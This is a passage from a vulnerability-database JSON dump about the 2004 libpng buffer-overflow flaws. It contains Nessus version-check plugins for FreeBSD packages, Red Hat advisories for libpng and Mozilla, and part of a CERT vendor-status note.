"sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. 
Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(36897);\n script_version(\"1.17\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2004-0597\", \"CVE-2004-0598\", \"CVE-2004-0599\");\n script_xref(name:\"CERT\", value:\"160448\");\n script_xref(name:\"CERT\", value:\"236656\");\n script_xref(name:\"CERT\", value:\"286464\");\n script_xref(name:\"CERT\", value:\"388984\");\n script_xref(name:\"CERT\", value:\"477512\");\n script_xref(name:\"CERT\", value:\"817368\");\n script_xref(name:\"Secunia\", value:\"12219\");\n script_xref(name:\"Secunia\", value:\"12232\");\n\n 
script_name(english:\"FreeBSD : libpng stack-based buffer overflow and other code concerns (f9e3e60b-e650-11d8-9b0a-000347a4fa7d)\");\n script_summary(english:\"Checks for updated packages in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote FreeBSD host is missing one or more security-related\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Chris Evans has discovered multiple vulnerabilities in libpng, which\ncan be exploited by malicious people to compromise a vulnerable system\nor cause a DoS (Denial of Service).\"\n );\n # http://www.securityfocus.com/archive/1/370853\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.securityfocus.com/archive/1/370853\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://scary.beasts.org/security/CESA-2004-001.txt\"\n );\n # http://bugzilla.mozilla.org/show_bug.cgi?id=251381\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.mozilla.org/show_bug.cgi?id=251381\"\n );\n # http://www.uscert.gov/cas/techalerts/TA04-217A.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?0481eb4e\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://dl.sourceforge.net/sourceforge/libpng/ADVISORY.txt\"\n );\n # https://vuxml.freebsd.org/freebsd/f9e3e60b-e650-11d8-9b0a-000347a4fa7d.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?5ace326c\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:de-netscape7\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:firefox\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:fr-netscape7\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:ja-netscape-communicator-linux\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:ja-netscape-navigator-linux\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:ja-netscape7\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:ko-netscape-communicator-linux\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:ko-netscape-navigator-linux\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:linux-mozilla\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:linux-mozilla-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:linux-netscape-communicator\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:linux-netscape-navigator\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:linux-png\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:mozilla\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:mozilla-gtk1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:netscape-communicator\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:netscape-navigator\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:netscape7\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:png\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:pt_BR-netscape7\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:freebsd:freebsd:thunderbird\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2004/08/04\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2004/08/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/04/23\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"png<=1.2.5_7\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"linux-png<=1.0.14_3\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"linux-png>=1.2<=1.2.2\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"firefox<0.9.3\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"thunderbird<0.7.3\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"linux-mozilla<1.7.2\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"linux-mozilla-devel<1.7.2\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"mozilla<1.7.2,2\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"mozilla>=1.8.a,2<=1.8.a2,2\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"mozilla-gtk1<1.7.2\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"netscape-communicator<=4.78\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"netscape-navigator<=4.78\")) flag++;\nif 
(pkg_test(save_report:TRUE, pkg:\"linux-netscape-communicator<=4.8\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"linux-netscape-navigator<=4.8\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"ko-netscape-navigator-linux<=4.8\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"ko-netscape-communicator-linux<=4.8\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"ja-netscape-communicator-linux<=4.8\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"ja-netscape-navigator-linux<=4.8\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"netscape7<=7.1\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"ja-netscape7<=7.1\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"pt_BR-netscape7<=7.02\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"fr-netscape7<=7.02\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"de-netscape7<=7.02\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2016-09-26T17:24:43", "description": "The following package needs to be updated: firefox", "edition": 1, "published": "2004-08-06T00:00:00", "type": "nessus", "title": "FreeBSD : libpng stack-based buffer overflow and other code concerns (94)", "bulletinFamily": "scanner", "cvelist": ["CVE-2004-0599", "CVE-2004-0597", "CVE-2004-0598"], "modified": "2004-08-06T00:00:00", "id": "FREEBSD_LIBPNG_1257.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=14216", "sourceData": "# @DEPRECATED@\n#\n# This script has been deprecated by freebsd_pkg_f9e3e60be65011d89b0a000347a4fa7d.nasl.\n#\n# Disabled on 2011/10/02.\n#\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# This script contains information extracted from VuXML :\n#\n# Copyright 2003-2006 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, 
RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n#\n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n#\n#\n\ninclude('compat.inc');\n\nif ( description )\n{\n script_id(14216);\n script_version(\"$Revision: 1.14 $\");\n script_cve_id(\"CVE-2004-0599\");\n script_cve_id(\"CVE-2004-0598\");\n script_cve_id(\"CVE-2004-0597\");\n\n script_name(english:\"FreeBSD : libpng stack-based buffer overflow and other code concerns (94)\");\n\nscript_set_attribute(attribute:'synopsis', value: 'The remote host is missing a security update');\nscript_set_attribute(attribute:'description', value:'The following package needs to be updated: firefox');\nscript_set_attribute(attribute: 
'cvss_vector', value: 'CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C');\nscript_set_attribute(attribute:'solution', value: 'Update the package on the remote host');\nscript_set_attribute(attribute: 'see_also', value: 'http://bugzilla.mozilla.org/show_bug.cgi?id=251381\nhttp://dl.sourceforge.net/sourceforge/libpng/ADVISORY.txt\nhttp://scary.beasts.org/security/CESA-2004-001.txt\nhttp://secunia.com/advisories/12219\nhttp://secunia.com/advisories/12232\nhttp://www.mozilla.org/projects/security/known-vulnerabilities.html#seamonkey1.0.3\nhttp://www.mozilla.org/security/announce/2006/mfsa2006-09.html\nhttp://www.mozilla.org/security/announce/2006/mfsa2006-10.html\nhttp://www.mozilla.org/security/announce/2006/mfsa2006-11.html\nhttp://www.mozilla.org/security/announce/2006/mfsa2006-12.html\nhttp://www.mozilla.org/security/announce/2006/mfsa2006-13.html\nhttp://www.mozilla.org/security/announce/2006/mfsa2006-44.html\nhttp://www.mozilla.org/security/announce/2008/mfsa2008-47.html\nhttp://www.mozilla.org/security/announce/2008/mfsa2008-48.html\nhttp://www.osvdb.org/8312\nhttp://www.osvdb.org/8313\nhttp://www.osvdb.org/8314\nhttp://www.osvdb.org/8315\nhttp://www.osvdb.org/8316');\nscript_set_attribute(attribute:'see_also', value: 'http://www.FreeBSD.org/ports/portaudit/f9e3e60b-e650-11d8-9b0a-000347a4fa7d.html');\n\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2004/08/06\");\n script_end_attributes();\n script_summary(english:\"Check for firefox\");\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2010 Tenable Network Security, Inc.\");\n family[\"english\"] = \"FreeBSD Local Security Checks\";\n script_family(english:family[\"english\"]);\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/FreeBSD/pkg_info\");\n exit(0);\n}\n\n# Deprecated.\nexit(0, \"This plugin has been deprecated. 
Refer to plugin #36897 (freebsd_pkg_f9e3e60be65011d89b0a000347a4fa7d.nasl) instead.\");\n\nglobal_var cvss_score;\ncvss_score=10;\ninclude('freebsd_package.inc');\n\n\npkg_test(pkg:\"png<=1.2.5_7\");\n\npkg_test(pkg:\"linux-png<=1.0.14_3\");\n\npkg_test(pkg:\"linux-png>=1.2.*<=1.2.2\");\n\npkg_test(pkg:\"firefox<0.9.3\");\n\npkg_test(pkg:\"thunderbird<0.7.3\");\n\npkg_test(pkg:\"linux-mozilla<1.7.2\");\n\npkg_test(pkg:\"linux-mozilla-devel<1.7.2\");\n\npkg_test(pkg:\"mozilla<1.7.2,2\");\n\npkg_test(pkg:\"mozilla>=1.8.*,2<=1.8.a2,2\");\n\npkg_test(pkg:\"mozilla-gtk1<1.7.2\");\n\npkg_test(pkg:\"netscape-{communicator,navigator}<=4.78\");\n\npkg_test(pkg:\"linux-netscape-{communicator,navigator}<=4.8\");\n\npkg_test(pkg:\"{ja,ko}-netscape-{communicator,navigator}-linux<=4.8\");\n\npkg_test(pkg:\"{,ja-}netscape7<=7.1\");\n\npkg_test(pkg:\"{de-,fr-,pt_BR-}netscape7<=7.02\");\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "redhat": [{"lastseen": "2019-08-13T18:45:34", "bulletinFamily": "unix", "cvelist": ["CVE-2002-1363", "CVE-2004-0597", "CVE-2004-0598", "CVE-2004-0599"], "description": "The libpng package contains a library of functions for creating and\nmanipulating PNG (Portable Network Graphics) image format files.\n\nDuring a source code audit, Chris Evans discovered several buffer overflows\nin libpng. An attacker could create a carefully crafted PNG file in such a\nway that it would cause an application linked with libpng to execute\narbitrary code when the file was opened by a victim. The Common\nVulnerabilities and Exposures project (cve.mitre.org) has assigned the name\nCAN-2004-0597 to these issues. 
\n\nIn addition, this audit discovered a potential NULL pointer dereference in\nlibpng (CAN-2004-0598) and several integer overflow issues (CAN-2004-0599).\nAn attacker could create a carefully crafted PNG file in such a way that\nit would cause an application linked with libpng to crash when the file was\nopened by the victim.\n\nRed Hat would like to thank Chris Evans for discovering these issues.\n\nFor users of Red Hat Enterprise Linux 2.1 these patches also include a more\ncomplete fix for the out of bounds memory access flaw (CAN-2002-1363). \n\nAll users are advised to update to the updated libpng packages which\ncontain backported security patches and are not vulnerable to these issues.", "modified": "2018-05-11T23:27:06", "published": "2004-08-04T04:00:00", "id": "RHSA-2004:402", "href": "https://access.redhat.com/errata/RHSA-2004:402", "type": "redhat", "title": "(RHSA-2004:402) libpng security update", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-08-13T18:45:54", "bulletinFamily": "unix", "cvelist": ["CVE-2004-0597", "CVE-2004-0599", "CVE-2004-0718", "CVE-2004-0722", "CVE-2004-0757", "CVE-2004-0758", "CVE-2004-0759", "CVE-2004-0760", "CVE-2004-0761", "CVE-2004-0762", "CVE-2004-0763", "CVE-2004-0764", "CVE-2004-0765"], "description": "Mozilla is an open source Web browser, advanced email and newsgroup\nclient, IRC chat client, and HTML editor.\n\nA number of flaws have been found in Mozilla 1.4 that have been fixed in\nthe Mozilla 1.4.3 release: \n\nZen Parse reported improper input validation to the SOAPParameter object\nconstructor leading to an integer overflow and controllable heap\ncorruption. Malicious JavaScript could be written to utilize this flaw and\ncould allow arbitrary code execution. 
The Common Vulnerabilities and\nExposures project (cve.mitre.org) has assigned the name CAN-2004-0722 to\nthis issue.\n\nDuring a source code audit, Chris Evans discovered a buffer overflow and\ninteger overflows which affect the libpng code inside Mozilla. An attacker\ncould create a carefully crafted PNG file in such a way that it would cause\nMozilla to crash or execute arbitrary code when the image was viewed.\n(CAN-2004-0597, CAN-2004-0599)\n\nZen Parse reported a flaw in the POP3 capability. A malicious POP3 server\ncould send a carefully crafted response that would cause a heap overflow\nand potentially allow execution of arbitrary code as the user running\nMozilla. (CAN-2004-0757)\n\nMarcel Boesch found a flaw that allows a CA certificate to be imported with\na DN the same as that of the built-in CA root certificates, which can cause\na denial of service to SSL pages, as the malicious certificate is treated\nas invalid. (CAN-2004-0758)\n\nMet - Martin Hassman reported a flaw in Mozilla that could allow malicious\nJavascript code to upload local files from a users machine without\nrequiring confirmation. (CAN-2004-0759)\n\nMindlock Security reported a flaw in ftp URI handling. By using a NULL\ncharacter (%00) in a ftp URI, Mozilla can be confused into opening a\nresource as a different MIME type. (CAN-2004-0760)\n\nMozilla does not properly prevent a frame in one domain from injecting\ncontent into a frame that belongs to another domain, which facilitates\nwebsite spoofing and other attacks, also known as the frame injection\nvulnerability. (CAN-2004-0718)\n\nTolga Tarhan reported a flaw that can allow a malicious webpage to use a\nredirect sequence to spoof the security lock icon that makes a webpage\nappear to be encrypted. 
(CAN-2004-0761)\n\nJesse Ruderman reported a security issue that affects a number of browsers\nincluding Mozilla that could allow malicious websites to install arbitrary\nextensions by using interactive events to manipulate the XPInstall Security\ndialog box. (CAN-2004-0762)\n\nEmmanouel Kellinis discovered a caching flaw in Mozilla which allows\nmalicious websites to spoof certificates of trusted websites via\nredirects and Javascript that uses the \"onunload\" method. (CAN-2004-0763)\n\nMozilla allowed malicious websites to hijack the user interface via the\n\"chrome\" flag and XML User Interface Language (XUL) files. (CAN-2004-0764)\n\nThe cert_TestHostName function in Mozilla only checks the hostname portion\nof a certificate when the hostname portion of the URI is not a fully\nqualified domain name (FQDN). This flaw could be used for spoofing if an\nattacker had control of machines on a default DNS search path. (CAN-2004-0765)\n\nAll users are advised to update to these erratum packages which contain a\nsnapshot of Mozilla 1.4.3 including backported fixes and are not vulnerable\nto these issues.", "modified": "2019-03-22T23:43:47", "published": "2004-08-04T04:00:00", "id": "RHSA-2004:421", "href": "https://access.redhat.com/errata/RHSA-2004:421", "type": "redhat", "title": "(RHSA-2004:421) mozilla security update", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "cert": [{"lastseen": "2020-09-18T20:43:45", "bulletinFamily": "info", "cvelist": ["CVE-2002-1363", "CVE-2004-0421", "CVE-2004-0597", "CVE-2004-0598", "CVE-2004-0599"], "description": "### Overview \n\nThe Portable Network Graphics library ([libpng](<http://www.libpng.org/pub/png/libpng.html>)) contains several flaws in progressive image handling that could introduce a remotely exploitable vulnerability.\n\n### Description \n\nThe Portable Network Graphics ([PNG](<http://www.libpng.org/pub/png/spec/1.2/PNG-Contents.html>)[](<http://www.libpng.org/pub/png/>)) image format is used as 
an alternative to other image formats such as the Graphics Interchange Format (GIF). The libpng reference library is available for application developers to support the PNG image format.\n\nThe libpng library features the ability to display interlaced, or progressive display, PNG files or streams. A number of potential integer overflow errors exist in libpng's handling of such progressive display images. While the code that contains these errors introduces dangerous conditions, it is unclear what practical vulnerabilities it might present in applications using libpng. \n \nMultiple applications support the PNG image format, including web browsers, email clients, and various graphic utilities. Because multiple products have used the libpng reference library to implement native PNG image processing, multiple applications will be affected by this issue in different ways. \n \n--- \n \n### Impact \n\nThe complete impact of this vulnerability is not yet known. \n \n--- \n \n### Solution \n\n**Apply a patch from the vendor** \n \nPatches have been released to address this vulnerability. Please see the Systems Affected section of this document for more details. \n \n--- \n \n### Vendor Information\n\n286464\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Additional information available\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n**Javascript is disabled. Click here to view vendors.**\n\n### Apple Computer Inc. 
__ Affected\n\nNotified: July 16, 2004 Updated: June 01, 2005 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nAPPLE-SA-2004-09-09 Mac OS X 10.3.5\n\nMac OS X 10.3.5 is now available and delivers security enhancements \nfor the following components: \n \nComponent: libpng (Portable Network Graphics) \nCVE-IDs: CAN-2002-1363, CAN-2004-0421, CAN-2004-0597, \nCAN-2004-0598, CAN-2004-0599 \nImpact: Malicious png images can cause application crashes and could \nexecute arbitrary code \n \nDescription: A number of buffer overflows, null pointer dereferences \nand integer overflows have been discovered in the reference library \nfor reading and writing PNG images. These vulnerabilities have been \ncorrected in libpng which is used by the CoreGraphics and AppKit \nframeworks in Mac OS X. After installing this update, applications \nthat use the PNG image format via these frameworks will be protected \nagainst these flaws. \n \nNote: The libpng security fixes are also available separately for Mac \nOS X 10.3.4 and Mac OS X 10.2.8 via Security Update 2004-08-09. 
\n \nMac OS X 10.3.5 may be obtained from the Software Update \npane in System Preferences, or Apple's Software Downloads web site: \n<http://www.apple.com/support/downloads/>\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23286464 Feedback>).\n\n### Gentoo Affected\n\nUpdated: August 20, 2004 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23286464 Feedback>).\n\n### OpenPKG Affected\n\nUpdated: August 20, 2004 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23286464 Feedback>).\n\n### Slackware Affected\n\nUpdated: August 20, 2004 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please 
send us [email](<mailto:cert@cert.org?Subject=VU%23286464 Feedback>).\n\n### Trustix Secure Linux Affected\n\nUpdated: August 20, 2004 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23286464 Feedback>).\n\n### libpng.org __ Affected\n\nNotified: July 16, 2004 Updated: August 04, 2004 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThis issue has been resolved in libpng version [1.2.6rc1](<http://sourceforge.net/project/showfiles.php?group_id=5624&package_id=5683&release_id=258107>) (release candidate 1). 
An older version of libpng containing the backported fixes, [1.0.16rc1](<http://sourceforge.net/project/showfiles.php?group_id=5624&package_id=5683&release_id=258106>), is also available.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23286464 Feedback>).\n\n### Juniper Networks __ Not Affected\n\nNotified: July 16, 2004 Updated: July 23, 2004 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\n`Juniper Networks products are not susceptible to this vulnerability`\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23286464 Feedback>).\n\n### NEC Corporation __ Not Affected\n\nNotified: July 16, 2004 Updated: August 03, 2004 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\n`sent on August 2, 2004 \n \n[Software Products] \n \n* E-mail client software \"WeMail\" \n(shareware developped by NEC Communication Systems,Ltd.) \n- is NOT vulnerable. \nIt does not include any code originated from libPNG. \n \n* We continue to try to investigate other products possibly affected \nby these vulnerabilities. 
\n`\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23286464 Feedback>).\n\n### BSDI Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23286464 Feedback>).\n\n### Conectiva Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23286464 Feedback>).\n\n### Cray Inc. 
Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23286464 Feedback>).\n\n### Debian Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23286464 Feedback>).\n\n### Engarde Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23286464 Feedback>).\n\n### FreeBSD Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### 